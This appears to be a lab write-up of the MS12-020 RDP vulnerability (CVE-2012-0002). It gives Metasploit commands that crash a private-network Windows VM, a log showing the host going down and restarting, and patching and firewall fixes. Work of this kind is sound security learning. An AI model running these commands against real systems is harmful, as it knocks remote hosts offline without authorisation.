https://www.rapid7.com/db/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids
https://www.youtube.com/watch?v=8FhEK296jPg

Potential Vulnerability:

	PORT: 3389
	CVE: CVE-2012-0002
	DESCRIPTION:  The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 
		      2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does 
		      not properly process packets in memory, which allows remote attackers to execute arbitrary code by 
		      sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2)
		      is deleted, aka "Remote Desktop Protocol Vulnerability."	
	IMPACT: Run code of attacker's choice

The system is exploitable:

	B: Below is an MSF script to exploit it

		use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
		set RHOST 192.168.0.33
		exploit

	C: Below explain ways one fixes the VM. 
		https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020
		
		1. Disable Terminal Services, Remote Desktop, Remote Assistance feature if no longer required
		2. Block TCP port 3389 at the firewall
		3. Update Security Patch

		
MetaSploit Log
====================================================================================================================

msf exploit(ms05_017_msmq) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.0.33
msf auxiliary(ms12_020_maxchannelids) > exploit

[*] 192.168.0.33:3389 - 192.168.0.33:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.0.33:3389 - 192.168.0.33:3389 - 210 bytes sent
[*] 192.168.0.33:3389 - 192.168.0.33:3389 - Checking RDP status...
[+] 192.168.0.33:3389 - 192.168.0.33:3389 seems down
[*] Auxiliary module execution completed

# Windows computers restarted
